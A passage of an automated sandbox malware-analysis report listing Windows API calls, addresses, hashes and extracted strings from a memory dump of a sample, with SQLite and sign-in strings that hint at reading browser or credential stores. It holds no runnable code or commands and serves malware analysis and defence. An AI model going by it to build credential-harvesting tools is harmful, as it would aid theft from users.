                                                                        • wcscpy.MSVCRT ref: 0040A6C1
                                                                        • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                        • wcscpy.MSVCRT ref: 0040A6DB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                        • String ID: Unknown Error$netmsg.dll
                                                                        • API String ID: 2767993716-572158859
                                                                        • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                        • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                        • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                        • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                        APIs
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                        • wcscpy.MSVCRT ref: 0040DAFB
                                                                        • wcscpy.MSVCRT ref: 0040DB0B
                                                                        • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                          • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                        • API String ID: 3176057301-2039793938
                                                                        • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                        • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                        • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                        • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                        APIs
                                                                        Strings
                                                                        • unable to open database: %s, xrefs: 0042F84E
                                                                        • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                        • out of memory, xrefs: 0042F865
                                                                        • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                        • database is already attached, xrefs: 0042F721
                                                                        • too many attached databases - max %d, xrefs: 0042F64D
                                                                        • database %s is already in use, xrefs: 0042F6C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpymemset
                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                        • API String ID: 1297977491-2001300268
                                                                        • Opcode ID: 9fef2143278846cd95885c1cbe03afab34c3f4ef307752a183a19874e6a22e95
                                                                        • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                        • Opcode Fuzzy Hash: 9fef2143278846cd95885c1cbe03afab34c3f4ef307752a183a19874e6a22e95
                                                                        • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                        APIs
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                        • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                        • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                        • String ID: ($d
                                                                        • API String ID: 1140211610-1915259565
                                                                        • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                        • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                        • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                        • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                        APIs
                                                                        • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                        • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                        • GetLastError.KERNEL32 ref: 004178FB
                                                                        • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: File$ErrorLastLockSleepUnlock
                                                                        • String ID:
                                                                        • API String ID: 3015003838-0
                                                                        • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                        • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                        • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                        • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                        • GetLastError.KERNEL32 ref: 0041855C
                                                                        • Sleep.KERNEL32(00000064), ref: 00418571
                                                                        • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                        • GetLastError.KERNEL32 ref: 0041858E
                                                                        • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                        • free.MSVCRT ref: 004185AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                        • String ID:
                                                                        • API String ID: 2802642348-0
                                                                        • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                        • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                        • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                        • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                        • memset.MSVCRT ref: 00413ADC
                                                                        • memset.MSVCRT ref: 00413AEC
                                                                          • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                        • memset.MSVCRT ref: 00413BD7
                                                                        • wcscpy.MSVCRT ref: 00413BF8
                                                                        • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                        • String ID: 3A
                                                                        • API String ID: 3300951397-293699754
                                                                        • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                        • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                        • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                        • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00411AF6
                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                        • wcsrchr.MSVCRT ref: 00411B14
                                                                        • wcscat.MSVCRT ref: 00411B2E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                        • String ID: AE$.cfg$General$EA
                                                                        • API String ID: 776488737-1622828088
                                                                        • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                        • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                        • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                        • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040D8BD
                                                                        • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                        • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                        • memset.MSVCRT ref: 0040D906
                                                                        • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                        • _wcsicmp.MSVCRT ref: 0040D92F
                                                                          • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                          • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                        • String ID: sysdatetimepick32
                                                                        • API String ID: 1028950076-4169760276
                                                                        • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                        • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                        • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                        • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                        APIs
                                                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                        • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                        • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                        • memset.MSVCRT ref: 0041BA3D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memset
                                                                        • String ID: -journal$-wal
                                                                        • API String ID: 438689982-2894717839
                                                                        • Opcode ID: 652a12cf6a302e207f48c8133154bfb03b3265f69a79849ae706c603e6509742
                                                                        • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                        • Opcode Fuzzy Hash: 652a12cf6a302e207f48c8133154bfb03b3265f69a79849ae706c603e6509742
                                                                        • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                        • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                        • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                          • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                          • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                        • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Item$Dialog$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3975816621-0
                                                                        • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                        • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                        • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                        • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                        APIs
                                                                        • _wcsicmp.MSVCRT ref: 00444D09
                                                                        • _wcsicmp.MSVCRT ref: 00444D1E
                                                                        • _wcsicmp.MSVCRT ref: 00444D33
                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmp$wcslen$_memicmp
                                                                        • String ID: .save$http://$https://$log profile$signIn
                                                                        • API String ID: 1214746602-2708368587
                                                                        • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                        • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                        • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                        • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                        APIs
                                                                        • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                        • GetTickCount.KERNEL32 ref: 0041887D
                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                        • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                        • String ID:
                                                                        • API String ID: 4218492932-0
                                                                        • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                        • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                        • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                        • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                        APIs
                                                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                        • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                        • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                        • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                        • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memset
                                                                        • String ID: gj
                                                                        • API String ID: 438689982-4203073231
                                                                        • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                        • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                        • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                        • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                        APIs
                                                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                        • API String ID: 3510742995-2446657581
                                                                        • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                        • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                        • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                        • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                        • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                        • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                        • memset.MSVCRT ref: 00405ABB
